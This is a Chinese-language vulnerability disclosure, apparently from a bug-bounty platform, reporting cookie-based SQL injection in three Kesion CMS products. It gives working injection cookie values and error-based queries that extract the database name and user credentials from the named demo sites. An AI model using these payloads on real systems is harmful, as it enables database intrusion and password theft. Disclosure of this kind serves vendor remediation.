### 简要描述:
漳州市芗城区科兴信息技术有限公司(前身科汛网络开发工作室成立于2005年)座落在有着水仙花之乡的漳州市区,有着便捷的交通网络,得天独厚的地理环境,是一家主营网络软件开发与销售、软件咨询与服务等业务的高新技术企业,拥有互联网著名品牌KesionCMSTM和科汛在线图文下单管理系统。公司的网站(kesion.com)和技术论坛(bbs.kesion.com)是目前国内极具影响力的服务型网站和论坛。公司拥有一流的软件产品设计和开发团队,具有丰富的网络应用软件设计开发经验,尤其在网站内容管理系统、下单管理系统的开发及其相关领域,经过长期创新性开发,掌握了一整套从算法、数据结构到产品安全性方面的领先技术,使得产品无论在稳定性、代码优化、运行效率、负载能力、安全等级、功能可操控性和权限严密性等方面都居国内外同类产品领先地位。公司始终专注于研发具有自主核心技术和知识产权的软件产品,其中的一款主要产品《科汛网站管理系统》(简称:KesionCMSTM)具有cms行业中最人性化,上手度最容易,系统功能最全之称,一直以来倍受广大网友的欢迎。目前拥有大量的用户群,涉及到政府、企业、科研教育和媒体等各个行业领域,一直以来得到业界同仁和客户的一致好评。我们坚持"以客户为中心",开拓业务,真诚希望与您建立良好的合作关系,以我们的专业水平、合理价格、优质服务成为您成功的桥梁和纽带。公司视服务为企业生命,视客户为企业之本,以服务客户为企业宗旨,努力提升服务水平,以优秀服务为客户节约成本、创造价值,赢得了广大用户的信赖与支持。我们致力为用户提供最优秀的网站建设和电子商务解决方案及相关咨询服务,全心全意提供令客户满意的产品和服务。
### 详细说明:
我就不分开发了 刷洞可耻 通过了请定价高些哈
漏洞程序为科讯CMS的.net框架程序
Cookie处过滤不当导致SQL注入
直接演示吧
官方演示站:http://i.kesion.com/
首先来到首页
http://i.kesion.com/
然后在COOKIE中加入我们的注入语句
添加一条COOkie
USER=userid=441&username=50959205505' and user>0--&password=95eb3b414d45044e&RndPassword=YF82S4G6ZFCPKXZX821W
[<img src="https://images.seebug.org/upload/201505/051107500db8a6703b56b37fd475a7f54fa260ff.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/051107500db8a6703b56b37fd475a7f54fa260ff.jpg)
然后访问http://i.kesion.com/user/index.aspx
[<img src="https://images.seebug.org/upload/201505/05110838256fc90a602bb44166f33ba7801ecf4f.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/05110838256fc90a602bb44166f33ba7801ecf4f.jpg)
And 1=(select db_name()) //当前数据库名
[<img src="https://images.seebug.org/upload/201505/05111041ae7be9720d468fcf316051b11a4d1e40.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/05111041ae7be9720d468fcf316051b11a4d1e40.jpg)
爆用户名
[<img src="https://images.seebug.org/upload/201505/051111448e70d3bc0f1c59212332cb98b9f56187.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/051111448e70d3bc0f1c59212332cb98b9f56187.jpg)
爆密码
[<img src="https://images.seebug.org/upload/201505/051112240df6c89e1a1e27948724c7df067eb7d6.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/051112240df6c89e1a1e27948724c7df067eb7d6.jpg)
2#。
漏洞系统http://imall.kesion.com
此次漏洞系统为科讯CMS的商城系统
也是Cookie处过滤不当导致SQL注入
直接演示吧
官方演示站:http://imall.kesion.com
首先来到首页
http://imall.kesion.com
然后在COOKIE中加入我们的注入语句
添加一条COOkie
USER=userid=441&username=50959205505' and user>0--&password=95eb3b414d45044e&RndPassword=YF82S4G6ZFCPKXZX821W
[<img src="https://images.seebug.org/upload/201505/05111401a9a092d6b8794314d2c3d8ac86f822ce.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/05111401a9a092d6b8794314d2c3d8ac86f822ce.jpg)
访问http://imall.kesion.com/user/index.aspx
[<img src="https://images.seebug.org/upload/201505/05111511d7d91f893c4469848f0b1d79eb7167e9.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/05111511d7d91f893c4469848f0b1d79eb7167e9.jpg)
and (select top 1 ks_user.UserName from ks_user )>0--
爆用户
[<img src="https://images.seebug.org/upload/201505/05111558404cb53f1356164a6d7a5cdf0784c712.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/05111558404cb53f1356164a6d7a5cdf0784c712.jpg)
and (select top 1 ks_user.PASSWORD from ks_user )>0-- 爆密码
[<img src="https://images.seebug.org/upload/201505/051116371125869ee062d83b8ddf1b05a17a0f87.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/051116371125869ee062d83b8ddf1b05a17a0f87.jpg)
3#。
漏洞系统http://me.kesion.com
此次漏洞系统为科讯CMS的网校系统
也是Cookie处过滤不当导致SQL注入
直接演示吧
官方演示站:http://me.kesion.com
首先来到首页
http://me.kesion.com
添加一条COOkie
然后在COOKIE中加入我们的注入语句
user=userid=186&username=50959205505 'And 1=(select db_name())--&password=95eb3b414d45044e&RndPassword=NBYCAPLTNTPHUZ7X6AXT
[<img src="https://images.seebug.org/upload/201505/051118241303c1c31198f51fab46a1dd206cfa89.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/051118241303c1c31198f51fab46a1dd206cfa89.jpg)
USER=userid=186&username=50959205505 'having 1=1--&password=95eb3b414d45044e&RndPassword=NBYCAPLTNTPHUZ7X6AXT
[<img src="https://images.seebug.org/upload/201505/05111924f9a5ec06b329c1fd8995d3eb3112466c.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/05111924f9a5ec06b329c1fd8995d3eb3112466c.jpg)
爆用户
and (select top 1 ks_user.UserName from ks_user )>0--
[<img src="https://images.seebug.org/upload/201505/0511200933a7ece771be4329768ed279f41ca6d5.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/0511200933a7ece771be4329768ed279f41ca6d5.jpg)
爆密码
and (select top 1 ks_user.PASSWORD from ks_user )>0--
[<img src="https://images.seebug.org/upload/201505/0511205371a9c98f48e756a7913f1627d1b18681.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/0511205371a9c98f48e756a7913f1627d1b18681.jpg)
### 漏洞证明:
麻烦把我沉积多年的漏洞 审核了吧 哥哥 收下小弟的膝盖!
暂无评论